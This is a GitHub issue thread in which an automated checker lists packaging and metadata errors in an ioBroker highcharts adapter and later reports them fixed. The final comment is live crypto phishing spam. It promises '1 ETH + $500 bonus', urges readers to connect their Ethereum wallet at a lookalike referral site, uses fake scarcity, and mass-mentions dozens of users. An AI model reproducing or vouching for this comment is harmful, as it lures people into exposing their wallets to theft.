### ISSUE TITLE
Think about to fix the issues found by adapter checker

### ISSUE THREAD

**Issue by ioBrokerChecker** [Motorpsycho123/ioBroker.highcharts#2]
I am an automatic service that looks for possible errors in ioBroker and creates an issue for it. The link below leads directly to the test:

https://adapter-check.iobroker.in/?q=https://raw.githubusercontent.com/jhoos70/ioBroker.highcharts

- [ ] [E019] Invalid repository URL: https://github.com/Motorpsycho123/ioBroker.highcharts. Expected: git+https://github.com/jhoos70/ioBroker.highcharts.git
- [ ] [E104] No common.titleLang found in io-package.json
- [ ] [E112] extIcon must be the same as an icon but with github path
- [ ] [E114] No adapter are allowed in the repo without admin3 support
- [ ] [E115] No license found in io-package.json
- [ ] [E150] No common.connectionType found in io-package.json
- [ ] [E152] No common.dataSource found in io-package.json
- [ ] [E125] External icon not found under URL: https://cloud.highcharts.com/favicon/apple-touch-icon-180x180.png
- [ ] [E200] Not found on npm. Please publish
- [ ] [E300] Not found on travis. Please setup travis
- [ ] [E801] No repository about text found. Please go to "https://github.com/jhoos70/ioBroker.highcharts", press the settings button beside the about title and add the description.
- [ ] [E802] No topics found in the repository. Please go to "https://github.com/jhoos70/ioBroker.highcharts", press the settings button beside the about title and add some topics.
- [ ] [E603] NO "## Changelog" found in README.md
- [ ] [E604] No "## License" found in README.md

I have also found warnings that may be fixed if possible.

- [ ] [W400] Cannot find "highcharts" in latest repository

Thanks,
your automatic adapter checker.

P.S.: There is a community in Github, which supports the maintenance and further development of adapters. There you will find many experienced developers who are always ready to assist anyone. New developers are always welcome there. For more informations visit: https://github.com/iobroker-community-adapters/info

**Comment by ioBrokerChecker** [comment]
Do you need help fixing the bugs?

**Comment by ioBrokerChecker** [comment]
Thanks, that all bugs have been fixed.

**Comment by mariusgherasie** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
jasonfmorton, @ranopark, @a-velesov, @pynchmeister, @ErgunKargun, @vijayantkatyal, @jearangoo, @tifftalk, @MikeFilimonov, @cnasikas, @ryanjvi, @JonasGao, @JonTofant, @Rao-Zhi, @dotslashf, @nirga, @0xgxthxb, @mikedryan, @MakisChristou, @JagLin, @michaelneuder, @vikrant1708, @modulexcite, @IntelAdviseMark, @Pomelo1213, @nhat416, @viteshan, @cometlj, @zza136055370, @Fila1982, @kevin-chau, @pregress, @xiaoyu2006, @sourishkrout, @rickiey, @oswaldb22, @JithinKS97, @van0303, @dssysolyatin, @melonwool, @joelmarquez90, @matrizlab, @yenilikci, @ExtremelySunnyYK, @icole, @dolchg, @shudery, @aymanesarrar, @arsaccol, @makevoid
